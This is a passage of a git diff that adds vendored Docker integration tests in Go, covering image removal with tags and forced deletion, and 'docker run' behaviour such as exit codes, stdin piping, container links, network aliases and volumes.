+	dockerCmd(c, "tag", "busybox", "utest/docker:tag2")
+	dockerCmd(c, "tag", "busybox", "utest:5000/docker:tag3")
+	{
+		imagesAfter, _ := dockerCmd(c, "images", "-a")
+		c.Assert(strings.Count(imagesAfter, "\n"), checker.Equals, strings.Count(imagesBefore, "\n")+3, check.Commentf("before: %q\n\nafter: %q\n", imagesBefore, imagesAfter))
+	}
+	dockerCmd(c, "rmi", "utest/docker:tag2")
+	{
+		imagesAfter, _ := dockerCmd(c, "images", "-a")
+		c.Assert(strings.Count(imagesAfter, "\n"), checker.Equals, strings.Count(imagesBefore, "\n")+2, check.Commentf("before: %q\n\nafter: %q\n", imagesBefore, imagesAfter))
+	}
+	dockerCmd(c, "rmi", "utest:5000/docker:tag3")
+	{
+		imagesAfter, _ := dockerCmd(c, "images", "-a")
+		c.Assert(strings.Count(imagesAfter, "\n"), checker.Equals, strings.Count(imagesBefore, "\n")+1, check.Commentf("before: %q\n\nafter: %q\n", imagesBefore, imagesAfter))
+
+	}
+	dockerCmd(c, "rmi", "utest:tag1")
+	{
+		imagesAfter, _ := dockerCmd(c, "images", "-a")
+		c.Assert(strings.Count(imagesAfter, "\n"), checker.Equals, strings.Count(imagesBefore, "\n"), check.Commentf("before: %q\n\nafter: %q\n", imagesBefore, imagesAfter))
+
+	}
+}
+
+func (s *DockerSuite) TestRmiImgIDMultipleTag(c *check.C) {
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "mkdir '/busybox-one'")
+
+	containerID := strings.TrimSpace(out)
+
+	// Wait for it to exit as cannot commit a running container on Windows, and
+	// it will take a few seconds to exit
+	if daemonPlatform == "windows" {
+		err := waitExited(containerID, 60*time.Second)
+		c.Assert(err, check.IsNil)
+	}
+
+	dockerCmd(c, "commit", containerID, "busybox-one")
+
+	imagesBefore, _ := dockerCmd(c, "images", "-a")
+	dockerCmd(c, "tag", "busybox-one", "busybox-one:tag1")
+	dockerCmd(c, "tag", "busybox-one", "busybox-one:tag2")
+
+	imagesAfter, _ := dockerCmd(c, "images", "-a")
+	// tag busybox to create 2 more images with same imageID
+	c.Assert(strings.Count(imagesAfter, "\n"), checker.Equals, strings.Count(imagesBefore, "\n")+2, check.Commentf("docker images shows: %q\n", imagesAfter))
+
+	imgID := inspectField(c, "busybox-one:tag1", "Id")
+
+	// run a container with the image
+	out, _ = runSleepingContainerInImage(c, "busybox-one")
+
+	containerID = strings.TrimSpace(out)
+
+	// first checkout without force it fails
+	out, _, err := dockerCmdWithError("rmi", imgID)
+	expected := fmt.Sprintf("conflict: unable to delete %s (cannot be forced) - image is being used by running container %s", stringid.TruncateID(imgID), stringid.TruncateID(containerID))
+	// rmi tagged in multiple repos should have failed without force
+	c.Assert(err, checker.NotNil)
+	c.Assert(out, checker.Contains, expected)
+
+	dockerCmd(c, "stop", containerID)
+	dockerCmd(c, "rmi", "-f", imgID)
+
+	imagesAfter, _ = dockerCmd(c, "images", "-a")
+	// rmi -f failed, image still exists
+	c.Assert(imagesAfter, checker.Not(checker.Contains), imgID[:12], check.Commentf("ImageID:%q; ImagesAfter: %q", imgID, imagesAfter))
+}
+
+func (s *DockerSuite) TestRmiImgIDForce(c *check.C) {
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "mkdir '/busybox-test'")
+
+	containerID := strings.TrimSpace(out)
+
+	// Wait for it to exit as cannot commit a running container on Windows, and
+	// it will take a few seconds to exit
+	if daemonPlatform == "windows" {
+		err := waitExited(containerID, 60*time.Second)
+		c.Assert(err, check.IsNil)
+	}
+
+	dockerCmd(c, "commit", containerID, "busybox-test")
+
+	imagesBefore, _ := dockerCmd(c, "images", "-a")
+	dockerCmd(c, "tag", "busybox-test", "utest:tag1")
+	dockerCmd(c, "tag", "busybox-test", "utest:tag2")
+	dockerCmd(c, "tag", "busybox-test", "utest/docker:tag3")
+	dockerCmd(c, "tag", "busybox-test", "utest:5000/docker:tag4")
+	{
+		imagesAfter, _ := dockerCmd(c, "images", "-a")
+		c.Assert(strings.Count(imagesAfter, "\n"), checker.Equals, strings.Count(imagesBefore, "\n")+4, check.Commentf("before: %q\n\nafter: %q\n", imagesBefore, imagesAfter))
+	}
+	imgID := inspectField(c, "busybox-test", "Id")
+
+	// first checkout without force it fails
+	out, _, err := dockerCmdWithError("rmi", imgID)
+	// rmi tagged in multiple repos should have failed without force
+	c.Assert(err, checker.NotNil)
+	// rmi tagged in multiple repos should have failed without force
+	c.Assert(out, checker.Contains, "(must be forced) - image is referenced in multiple repositories", check.Commentf("out: %s; err: %v;", out, err))
+
+	dockerCmd(c, "rmi", "-f", imgID)
+	{
+		imagesAfter, _ := dockerCmd(c, "images", "-a")
+		// rmi failed, image still exists
+		c.Assert(imagesAfter, checker.Not(checker.Contains), imgID[:12])
+	}
+}
+
+// See https://github.com/docker/docker/issues/14116
+func (s *DockerSuite) TestRmiImageIDForceWithRunningContainersAndMultipleTags(c *check.C) {
+	dockerfile := "FROM busybox\nRUN echo test 14116\n"
+	imgID, err := buildImage("test-14116", dockerfile, false)
+	c.Assert(err, checker.IsNil)
+
+	newTag := "newtag"
+	dockerCmd(c, "tag", imgID, newTag)
+	runSleepingContainerInImage(c, imgID)
+
+	out, _, err := dockerCmdWithError("rmi", "-f", imgID)
+	// rmi -f should not delete image with running containers
+	c.Assert(err, checker.NotNil)
+	c.Assert(out, checker.Contains, "(cannot be forced) - image is being used by running container")
+}
+
+func (s *DockerSuite) TestRmiTagWithExistingContainers(c *check.C) {
+	container := "test-delete-tag"
+	newtag := "busybox:newtag"
+	bb := "busybox:latest"
+	dockerCmd(c, "tag", bb, newtag)
+
+	dockerCmd(c, "run", "--name", container, bb, "/bin/true")
+
+	out, _ := dockerCmd(c, "rmi", newtag)
+	c.Assert(strings.Count(out, "Untagged: "), checker.Equals, 1)
+}
+
+func (s *DockerSuite) TestRmiForceWithExistingContainers(c *check.C) {
+	image := "busybox-clone"
+
+	cmd := exec.Command(dockerBinary, "build", "--no-cache", "-t", image, "-")
+	cmd.Stdin = strings.NewReader(`FROM busybox
+MAINTAINER foo`)
+
+	out, _, err := runCommandWithOutput(cmd)
+	c.Assert(err, checker.IsNil, check.Commentf("Could not build %s: %s", image, out))
+
+	dockerCmd(c, "run", "--name", "test-force-rmi", image, "/bin/true")
+
+	dockerCmd(c, "rmi", "-f", image)
+}
+
+func (s *DockerSuite) TestRmiWithMultipleRepositories(c *check.C) {
+	newRepo := "127.0.0.1:5000/busybox"
+	oldRepo := "busybox"
+	newTag := "busybox:test"
+	dockerCmd(c, "tag", oldRepo, newRepo)
+
+	dockerCmd(c, "run", "--name", "test", oldRepo, "touch", "/abcd")
+
+	dockerCmd(c, "commit", "test", newTag)
+
+	out, _ := dockerCmd(c, "rmi", newTag)
+	c.Assert(out, checker.Contains, "Untagged: "+newTag)
+}
+
+func (s *DockerSuite) TestRmiForceWithMultipleRepositories(c *check.C) {
+	imageName := "rmiimage"
+	tag1 := imageName + ":tag1"
+	tag2 := imageName + ":tag2"
+
+	_, err := buildImage(tag1,
+		`FROM busybox
+		MAINTAINER "docker"`,
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	dockerCmd(c, "tag", tag1, tag2)
+
+	out, _ := dockerCmd(c, "rmi", "-f", tag2)
+	c.Assert(out, checker.Contains, "Untagged: "+tag2)
+	c.Assert(out, checker.Not(checker.Contains), "Untagged: "+tag1)
+
+	// Check built image still exists
+	images, _ := dockerCmd(c, "images", "-a")
+	c.Assert(images, checker.Contains, imageName, check.Commentf("Built image missing %q; Images: %q", imageName, images))
+}
+
+func (s *DockerSuite) TestRmiBlank(c *check.C) {
+	out, _, err := dockerCmdWithError("rmi", " ")
+	// Should have failed to delete ' ' image
+	c.Assert(err, checker.NotNil)
+	// Wrong error message generated
+	c.Assert(out, checker.Not(checker.Contains), "no such id", check.Commentf("out: %s", out))
+	// Expected error message not generated
+	c.Assert(out, checker.Contains, "image name cannot be blank", check.Commentf("out: %s", out))
+}
+
+func (s *DockerSuite) TestRmiContainerImageNotFound(c *check.C) {
+	// Build 2 images for testing.
+	imageNames := []string{"test1", "test2"}
+	imageIds := make([]string, 2)
+	for i, name := range imageNames {
+		dockerfile := fmt.Sprintf("FROM busybox\nMAINTAINER %s\nRUN echo %s\n", name, name)
+		id, err := buildImage(name, dockerfile, false)
+		c.Assert(err, checker.IsNil)
+		imageIds[i] = id
+	}
+
+	// Create a long-running container.
+	runSleepingContainerInImage(c, imageNames[0])
+
+	// Create a stopped container, and then force remove its image.
+	dockerCmd(c, "run", imageNames[1], "true")
+	dockerCmd(c, "rmi", "-f", imageIds[1])
+
+	// Try to remove the image of the running container and see if it fails as expected.
+	out, _, err := dockerCmdWithError("rmi", "-f", imageIds[0])
+	// The image of the running container should not be removed.
+	c.Assert(err, checker.NotNil)
+	c.Assert(out, checker.Contains, "image is being used by running container", check.Commentf("out: %s", out))
+}
+
+// #13422
+func (s *DockerSuite) TestRmiUntagHistoryLayer(c *check.C) {
+	image := "tmp1"
+	// Build an image for testing.
+	dockerfile := `FROM busybox
+MAINTAINER foo
+RUN echo 0 #layer0
+RUN echo 1 #layer1
+RUN echo 2 #layer2
+`
+	_, err := buildImage(image, dockerfile, false)
+	c.Assert(err, checker.IsNil)
+
+	out, _ := dockerCmd(c, "history", "-q", image)
+	ids := strings.Split(out, "\n")
+	idToTag := ids[2]
+
+	// Tag layer0 to "tmp2".
+	newTag := "tmp2"
+	dockerCmd(c, "tag", idToTag, newTag)
+	// Create a container based on "tmp1".
+	dockerCmd(c, "run", "-d", image, "true")
+
+	// See if the "tmp2" can be untagged.
+	out, _ = dockerCmd(c, "rmi", newTag)
+	// Expected 1 untagged entry
+	c.Assert(strings.Count(out, "Untagged: "), checker.Equals, 1, check.Commentf("out: %s", out))
+
+	// Now let's add the tag again and create a container based on it.
+	dockerCmd(c, "tag", idToTag, newTag)
+	out, _ = dockerCmd(c, "run", "-d", newTag, "true")
+	cid := strings.TrimSpace(out)
+
+	// At this point we have 2 containers, one based on layer2 and another based on layer0.
+	// Try to untag "tmp2" without the -f flag.
+	out, _, err = dockerCmdWithError("rmi", newTag)
+	// should not be untagged without the -f flag
+	c.Assert(err, checker.NotNil)
+	c.Assert(out, checker.Contains, cid[:12])
+	c.Assert(out, checker.Contains, "(must force)")
+
+	// Add the -f flag and test again.
+	out, _ = dockerCmd(c, "rmi", "-f", newTag)
+	// should be allowed to untag with the -f flag
+	c.Assert(out, checker.Contains, fmt.Sprintf("Untagged: %s:latest", newTag))
+}
+
+func (*DockerSuite) TestRmiParentImageFail(c *check.C) {
+	_, err := buildImage("test", `
+	FROM busybox
+	RUN echo hello`, false)
+	c.Assert(err, checker.IsNil)
+
+	id := inspectField(c, "busybox", "ID")
+	out, _, err := dockerCmdWithError("rmi", id)
+	c.Assert(err, check.NotNil)
+	if !strings.Contains(out, "image has dependent child images") {
+		c.Fatalf("rmi should have failed because it's a parent image, got %s", out)
+	}
+}
+
+func (s *DockerSuite) TestRmiWithParentInUse(c *check.C) {
+	out, _ := dockerCmd(c, "create", "busybox")
+	cID := strings.TrimSpace(out)
+
+	out, _ = dockerCmd(c, "commit", cID)
+	imageID := strings.TrimSpace(out)
+
+	out, _ = dockerCmd(c, "create", imageID)
+	cID = strings.TrimSpace(out)
+
+	out, _ = dockerCmd(c, "commit", cID)
+	imageID = strings.TrimSpace(out)
+
+	dockerCmd(c, "rmi", imageID)
+}
+
+// #18873
+func (s *DockerSuite) TestRmiByIDHardConflict(c *check.C) {
+	dockerCmd(c, "create", "busybox")
+
+	imgID := inspectField(c, "busybox:latest", "Id")
+
+	_, _, err := dockerCmdWithError("rmi", imgID[:12])
+	c.Assert(err, checker.NotNil)
+
+	// check that tag was not removed
+	imgID2 := inspectField(c, "busybox:latest", "Id")
+	c.Assert(imgID, checker.Equals, imgID2)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_run_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_run_test.go
new file mode 100644
index 0000000000..9462aef800
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_run_test.go
@@ -0,0 +1,4689 @@
+package main
+
+import (
+	"bufio"
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"net"
+	"os"
+	"os/exec"
+	"path"
+	"path/filepath"
+	"reflect"
+	"regexp"
+	"runtime"
+	"sort"
+	"strconv"
+	"strings"
+	"sync"
+	"time"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	icmd "github.com/docker/docker/pkg/integration/cmd"
+	"github.com/docker/docker/pkg/mount"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/docker/pkg/stringutils"
+	"github.com/docker/docker/runconfig"
+	"github.com/docker/go-connections/nat"
+	"github.com/docker/libnetwork/resolvconf"
+	"github.com/docker/libnetwork/types"
+	"github.com/go-check/check"
+	libcontainerUser "github.com/opencontainers/runc/libcontainer/user"
+)
+
+// "test123" should be printed by docker run
+func (s *DockerSuite) TestRunEchoStdout(c *check.C) {
+	out, _ := dockerCmd(c, "run", "busybox", "echo", "test123")
+	if out != "test123\n" {
+		c.Fatalf("container should've printed 'test123', got '%s'", out)
+	}
+}
+
+// "test" should be printed
+func (s *DockerSuite) TestRunEchoNamedContainer(c *check.C) {
+	out, _ := dockerCmd(c, "run", "--name", "testfoonamedcontainer", "busybox", "echo", "test")
+	if out != "test\n" {
+		c.Errorf("container should've printed 'test'")
+	}
+}
+
+// docker run should not leak file descriptors. This test relies on Unix
+// specific functionality and cannot run on Windows.
+func (s *DockerSuite) TestRunLeakyFileDescriptors(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	out, _ := dockerCmd(c, "run", "busybox", "ls", "-C", "/proc/self/fd")
+
+	// normally, we should only get 0, 1, and 2, but 3 gets created by "ls" when it does "opendir" on the "fd" directory
+	if out != "0  1  2  3\n" {
+		c.Errorf("container should've printed '0  1  2  3', not: %s", out)
+	}
+}
+
+// it should be possible to lookup Google DNS
+// this will fail when Internet access is unavailable
+func (s *DockerSuite) TestRunLookupGoogleDNS(c *check.C) {
+	testRequires(c, Network, NotArm)
+	if daemonPlatform == "windows" {
+		// nslookup isn't present in Windows busybox. Is built-in. Further,
+		// nslookup isn't present in nanoserver. Hence just use PowerShell...
+		dockerCmd(c, "run", WindowsBaseImage, "powershell", "Resolve-DNSName", "google.com")
+	} else {
+		dockerCmd(c, "run", DefaultImage, "nslookup", "google.com")
+	}
+
+}
+
+// the exit code should be 0
+func (s *DockerSuite) TestRunExitCodeZero(c *check.C) {
+	dockerCmd(c, "run", "busybox", "true")
+}
+
+// the exit code should be 1
+func (s *DockerSuite) TestRunExitCodeOne(c *check.C) {
+	_, exitCode, err := dockerCmdWithError("run", "busybox", "false")
+	c.Assert(err, checker.NotNil)
+	c.Assert(exitCode, checker.Equals, 1)
+}
+
+// it should be possible to pipe in data via stdin to a process running in a container
+func (s *DockerSuite) TestRunStdinPipe(c *check.C) {
+	// TODO Windows: This needs some work to make compatible.
+	testRequires(c, DaemonIsLinux)
+	runCmd := exec.Command(dockerBinary, "run", "-i", "-a", "stdin", "busybox", "cat")
+	runCmd.Stdin = strings.NewReader("blahblah")
+	out, _, _, err := runCommandWithStdoutStderr(runCmd)
+	if err != nil {
+		c.Fatalf("failed to run container: %v, output: %q", err, out)
+	}
+
+	out = strings.TrimSpace(out)
+	dockerCmd(c, "wait", out)
+
+	logsOut, _ := dockerCmd(c, "logs", out)
+
+	containerLogs := strings.TrimSpace(logsOut)
+	if containerLogs != "blahblah" {
+		c.Errorf("logs didn't print the container's logs %s", containerLogs)
+	}
+
+	dockerCmd(c, "rm", out)
+}
+
+// the container's ID should be printed when starting a container in detached mode
+func (s *DockerSuite) TestRunDetachedContainerIDPrinting(c *check.C) {
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "true")
+
+	out = strings.TrimSpace(out)
+	dockerCmd(c, "wait", out)
+
+	rmOut, _ := dockerCmd(c, "rm", out)
+
+	rmOut = strings.TrimSpace(rmOut)
+	if rmOut != out {
+		c.Errorf("rm didn't print the container ID %s %s", out, rmOut)
+	}
+}
+
+// the working directory should be set correctly
+func (s *DockerSuite) TestRunWorkingDirectory(c *check.C) {
+	dir := "/root"
+	image := "busybox"
+	if daemonPlatform == "windows" {
+		dir = `C:/Windows`
+	}
+
+	// First with -w
+	out, _ := dockerCmd(c, "run", "-w", dir, image, "pwd")
+	out = strings.TrimSpace(out)
+	if out != dir {
+		c.Errorf("-w failed to set working directory")
+	}
+
+	// Then with --workdir
+	out, _ = dockerCmd(c, "run", "--workdir", dir, image, "pwd")
+	out = strings.TrimSpace(out)
+	if out != dir {
+		c.Errorf("--workdir failed to set working directory")
+	}
+}
+
+// pinging Google's DNS resolver should fail when we disable the networking
+func (s *DockerSuite) TestRunWithoutNetworking(c *check.C) {
+	count := "-c"
+	image := "busybox"
+	if daemonPlatform == "windows" {
+		count = "-n"
+		image = WindowsBaseImage
+	}
+
+	// First using the long form --net
+	out, exitCode, err := dockerCmdWithError("run", "--net=none", image, "ping", count, "1", "8.8.8.8")
+	if err != nil && exitCode != 1 {
+		c.Fatal(out, err)
+	}
+	if exitCode != 1 {
+		c.Errorf("--net=none should've disabled the network; the container shouldn't have been able to ping 8.8.8.8")
+	}
+}
+
+//test --link use container name to link target
+func (s *DockerSuite) TestRunLinksContainerWithContainerName(c *check.C) {
+	// TODO Windows: This test cannot run on a Windows daemon as the networking
+	// settings are not populated back yet on inspect.
+	testRequires(c, DaemonIsLinux)
+	dockerCmd(c, "run", "-i", "-t", "-d", "--name", "parent", "busybox")
+
+	ip := inspectField(c, "parent", "NetworkSettings.Networks.bridge.IPAddress")
+
+	out, _ := dockerCmd(c, "run", "--link", "parent:test", "busybox", "/bin/cat", "/etc/hosts")
+	if !strings.Contains(out, ip+"	test") {
+		c.Fatalf("use a container name to link target failed")
+	}
+}
+
+//test --link use container id to link target
+func (s *DockerSuite) TestRunLinksContainerWithContainerID(c *check.C) {
+	// TODO Windows: This test cannot run on a Windows daemon as the networking
+	// settings are not populated back yet on inspect.
+	testRequires(c, DaemonIsLinux)
+	cID, _ := dockerCmd(c, "run", "-i", "-t", "-d", "busybox")
+
+	cID = strings.TrimSpace(cID)
+	ip := inspectField(c, cID, "NetworkSettings.Networks.bridge.IPAddress")
+
+	out, _ := dockerCmd(c, "run", "--link", cID+":test", "busybox", "/bin/cat", "/etc/hosts")
+	if !strings.Contains(out, ip+"	test") {
+		c.Fatalf("use a container id to link target failed")
+	}
+}
+
+func (s *DockerSuite) TestUserDefinedNetworkLinks(c *check.C) {
+	testRequires(c, DaemonIsLinux, NotUserNamespace, NotArm)
+	dockerCmd(c, "network", "create", "-d", "bridge", "udlinkNet")
+
+	dockerCmd(c, "run", "-d", "--net=udlinkNet", "--name=first", "busybox", "top")
+	c.Assert(waitRun("first"), check.IsNil)
+
+	// run a container in user-defined network udlinkNet with a link for an existing container
+	// and a link for a container that doesn't exist
+	dockerCmd(c, "run", "-d", "--net=udlinkNet", "--name=second", "--link=first:foo",
+		"--link=third:bar", "busybox", "top")
+	c.Assert(waitRun("second"), check.IsNil)
+
+	// ping to first and its alias foo must succeed
+	_, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first")
+	c.Assert(err, check.IsNil)
+	_, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "foo")
+	c.Assert(err, check.IsNil)
+
+	// ping to third and its alias must fail
+	_, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "third")
+	c.Assert(err, check.NotNil)
+	_, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "bar")
+	c.Assert(err, check.NotNil)
+
+	// start third container now
+	dockerCmd(c, "run", "-d", "--net=udlinkNet", "--name=third", "busybox", "top")
+	c.Assert(waitRun("third"), check.IsNil)
+
+	// ping to third and its alias must succeed now
+	_, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "third")
+	c.Assert(err, check.IsNil)
+	_, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "bar")
+	c.Assert(err, check.IsNil)
+}
+
+func (s *DockerSuite) TestUserDefinedNetworkLinksWithRestart(c *check.C) {
+	testRequires(c, DaemonIsLinux, NotUserNamespace, NotArm)
+	dockerCmd(c, "network", "create", "-d", "bridge", "udlinkNet")
+
+	dockerCmd(c, "run", "-d", "--net=udlinkNet", "--name=first", "busybox", "top")
+	c.Assert(waitRun("first"), check.IsNil)
+
+	dockerCmd(c, "run", "-d", "--net=udlinkNet", "--name=second", "--link=first:foo",
+		"busybox", "top")
+	c.Assert(waitRun("second"), check.IsNil)
+
+	// ping to first and its alias foo must succeed
+	_, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first")
+	c.Assert(err, check.IsNil)
+	_, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "foo")
+	c.Assert(err, check.IsNil)
+
+	// Restart first container
+	dockerCmd(c, "restart", "first")
+	c.Assert(waitRun("first"), check.IsNil)
+
+	// ping to first and its alias foo must still succeed
+	_, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "first")
+	c.Assert(err, check.IsNil)
+	_, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "foo")
+	c.Assert(err, check.IsNil)
+
+	// Restart second container
+	dockerCmd(c, "restart", "second")
+	c.Assert(waitRun("second"), check.IsNil)
+
+	// ping to first and its alias foo must still succeed
+	_, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "first")
+	c.Assert(err, check.IsNil)
+	_, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "foo")
+	c.Assert(err, check.IsNil)
+}
+
+func (s *DockerSuite) TestRunWithNetAliasOnDefaultNetworks(c *check.C) {
+	testRequires(c, DaemonIsLinux, NotUserNamespace, NotArm)
+
+	defaults := []string{"bridge", "host", "none"}
+	for _, net := range defaults {
+		out, _, err := dockerCmdWithError("run", "-d", "--net", net, "--net-alias", "alias_"+net, "busybox", "top")
+		c.Assert(err, checker.NotNil)
+		c.Assert(out, checker.Contains, runconfig.ErrUnsupportedNetworkAndAlias.Error())
+	}
+}
+
+func (s *DockerSuite) TestUserDefinedNetworkAlias(c *check.C) {
+	testRequires(c, DaemonIsLinux, NotUserNamespace, NotArm)
+	dockerCmd(c, "network", "create", "-d", "bridge", "net1")
+
+	cid1, _ := dockerCmd(c, "run", "-d", "--net=net1", "--name=first", "--net-alias=foo1", "--net-alias=foo2", "busybox", "top")
+	c.Assert(waitRun("first"), check.IsNil)
+
+	// Check if default short-id alias is added automatically
+	id := strings.TrimSpace(cid1)
+	aliases := inspectField(c, id, "NetworkSettings.Networks.net1.Aliases")
+	c.Assert(aliases, checker.Contains, stringid.TruncateID(id))
+
+	cid2, _ := dockerCmd(c, "run", "-d", "--net=net1", "--name=second", "busybox", "top")
+	c.Assert(waitRun("second"), check.IsNil)
+
+	// Check if default short-id alias is added automatically
+	id = strings.TrimSpace(cid2)
+	aliases = inspectField(c, id, "NetworkSettings.Networks.net1.Aliases")
+	c.Assert(aliases, checker.Contains, stringid.TruncateID(id))
+
+	// ping to first and its network-scoped aliases
+	_, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first")
+	c.Assert(err, check.IsNil)
+	_, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "foo1")
+	c.Assert(err, check.IsNil)
+	_, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "foo2")
+	c.Assert(err, check.IsNil)
+	// ping first container's short-id alias
+	_, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", stringid.TruncateID(cid1))
+	c.Assert(err, check.IsNil)
+
+	// Restart first container
+	dockerCmd(c, "restart", "first")
+	c.Assert(waitRun("first"), check.IsNil)
+
+	// ping to first and its network-scoped aliases must succeed
+	_, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "first")
+	c.Assert(err, check.IsNil)
+	_, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "foo1")
+	c.Assert(err, check.IsNil)
+	_, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "foo2")
+	c.Assert(err, check.IsNil)
+	// ping first container's short-id alias
+	_, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", stringid.TruncateID(cid1))
+	c.Assert(err, check.IsNil)
+}
+
+// Issue 9677.
+func (s *DockerSuite) TestRunWithDaemonFlags(c *check.C) {
+	out, _, err := dockerCmdWithError("--exec-opt", "foo=bar", "run", "-i", "busybox", "true")
+	c.Assert(err, checker.NotNil)
+	c.Assert(out, checker.Contains, "unknown flag: --exec-opt")
+}
+
+// Regression test for #4979
+func (s *DockerSuite) TestRunWithVolumesFromExited(c *check.C) {
+
+	var (
+		out      string
+		exitCode int
+	)
+
+	// Create a file in a volume
+	if daemonPlatform == "windows" {
+		out, exitCode = dockerCmd(c, "run", "--name", "test-data", "--volume", `c:\some\dir`, WindowsBaseImage, "cmd", "/c", `echo hello > c:\some\dir\file`)
+	} else {
+		out, exitCode = dockerCmd(c, "run", "--name", "test-data", "--volume", "/some/dir", "busybox", "touch", "/some/dir/file")
+	}
+	if exitCode != 0 {
+		c.Fatal("1", out, exitCode)
+	}
+
+	// Read the file from another container using --volumes-from to access the volume in the second container
+	if daemonPlatform == "windows" {
+		out, exitCode = dockerCmd(c, "run", "--volumes-from", "test-data", WindowsBaseImage, "cmd", "/c", `type c:\some\dir\file`)
+	} else {
+		out, exitCode = dockerCmd(c, "run", "--volumes-from", "test-data", "busybox", "cat", "/some/dir/file")
+	}
+	if exitCode != 0 {
+		c.Fatal("2", out, exitCode)
+	}
+}
+
+// Volume path is a symlink which also exists on the host, and the host side is a file not a dir
+// But the volume call is just a normal volume, not a bind mount
+func (s *DockerSuite) TestRunCreateVolumesInSymlinkDir(c *check.C) {
+	var (
+		dockerFile    string
+		containerPath string
+		cmd           string
+	)
+	// TODO Windows (Post TP5): This test cannot run on a Windows daemon as
+	// Windows does not support symlinks inside a volume path
+	testRequires(c, SameHostDaemon, DaemonIsLinux)
+	name := "test-volume-symlink"
+
+	dir, err := ioutil.TempDir("", name)
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer os.RemoveAll(dir)
+
+	// In the case of Windows to Windows CI, if the machine is setup so that
+	// the temp directory is not the C: drive, this test is invalid and will
+	// not work.
+	if daemonPlatform == "windows" && strings.ToLower(dir[:1]) != "c" {
+		c.Skip("Requires TEMP to point to C: drive")
+	}
+
+	f, err := os.OpenFile(filepath.Join(dir, "test"), os.O_CREATE, 0700)
+	if err != nil {
+		c.Fatal(err)
+	}
+	f.Close()
+
+	if daemonPlatform == "windows" {
+		dockerFile = fmt.Sprintf("FROM %s\nRUN mkdir %s\nRUN mklink /D c:\\test %s", WindowsBaseImage, dir, dir)
+		containerPath = `c:\test\test`
+		cmd = "tasklist"
+	} else {
+		dockerFile = fmt.Sprintf("FROM busybox\nRUN mkdir -p %s\nRUN ln -s %s /test", dir, dir)
+		containerPath = "/test/test"
+		cmd = "true"
+	}
+	if _, err := buildImage(name, dockerFile, false); err != nil {
+		c.Fatal(err)
+	}
+
+	dockerCmd(c, "run", "-v", containerPath, name, cmd)
+}
+
+// Volume path is a symlink in the container
+func (s *DockerSuite) TestRunCreateVolumesInSymlinkDir2(c *check.C) {
+	var (
+		dockerFile    string
+		containerPath string
+		cmd           string
+	)
+	// TODO Windows (Post TP5): This test cannot run on a Windows daemon as
+	// Windows does not support symlinks inside a volume path
+	testRequires(c, SameHostDaemon, DaemonIsLinux)
+	name := "test-volume-symlink2"
+
+	if daemonPlatform == "windows" {
+		dockerFile = fmt.Sprintf("FROM %s\nRUN mkdir c:\\%s\nRUN mklink /D c:\\test c:\\%s", WindowsBaseImage, name, name)
+		containerPath = `c:\test\test`
+		cmd = "tasklist"
+	} else {
+		dockerFile = fmt.Sprintf("FROM busybox\nRUN mkdir -p /%s\nRUN ln -s /%s /test", name, name)
+		containerPath = "/test/test"
+		cmd = "true"
+	}
+	if _, err := buildImage(name, dockerFile, false); err != nil {
+		c.Fatal(err)
+	}
+
+	dockerCmd(c, "run", "-v", containerPath, name, cmd)
+}
+
+func (s *DockerSuite) TestRunVolumesMountedAsReadonly(c *check.C) {
+	// TODO Windows: Temporary check - remove once TP5 support is dropped
+	if daemonPlatform == "windows" && windowsDaemonKV < 14350 {
+		c.Skip("Needs later Windows build for RO volumes")
+	}
+	if _, code, err := dockerCmdWithError("run", "-v", "/test:/test:ro", "busybox", "touch", "/test/somefile"); err == nil || code == 0 {
+		c.Fatalf("run should fail because volume is ro: exit code %d", code)
+	}
+}
+
+func (s *DockerSuite) TestRunVolumesFromInReadonlyModeFails(c *check.C) {
+	// TODO Windows: Temporary check - remove once TP5 support is dropped
+	if daemonPlatform == "windows" && windowsDaemonKV < 14350 {
+		c.Skip("Needs later Windows build for RO volumes")
+	}
+	var (
+		volumeDir string
+		fileInVol string
+	)
+	if daemonPlatform == "windows" {
+		volumeDir = `c:/test` // Forward-slash as using busybox
+		fileInVol = `c:/test/file`
+	} else {
+		testRequires(c, DaemonIsLinux)
+		volumeDir = "/test"
+		fileInVol = `/test/file`
+	}
+	dockerCmd(c, "run", "--name", "parent", "-v", volumeDir, "busybox", "true")
+
+	if _, code, err := dockerCmdWithError("run", "--volumes-from", "parent:ro", "busybox", "touch", fileInVol); err == nil || code == 0 {
+		c.Fatalf("run should fail because volume is ro: exit code %d", code)
+	}
+}
+
+// Regression test for #1201
+func (s *DockerSuite) TestRunVolumesFromInReadWriteMode(c *check.C) {
+	var (
+		volumeDir string
+		fileInVol string
+	)
+	if daemonPlatform == "windows" {
+		volumeDir = `c:/test` // Forward-slash as using busybox
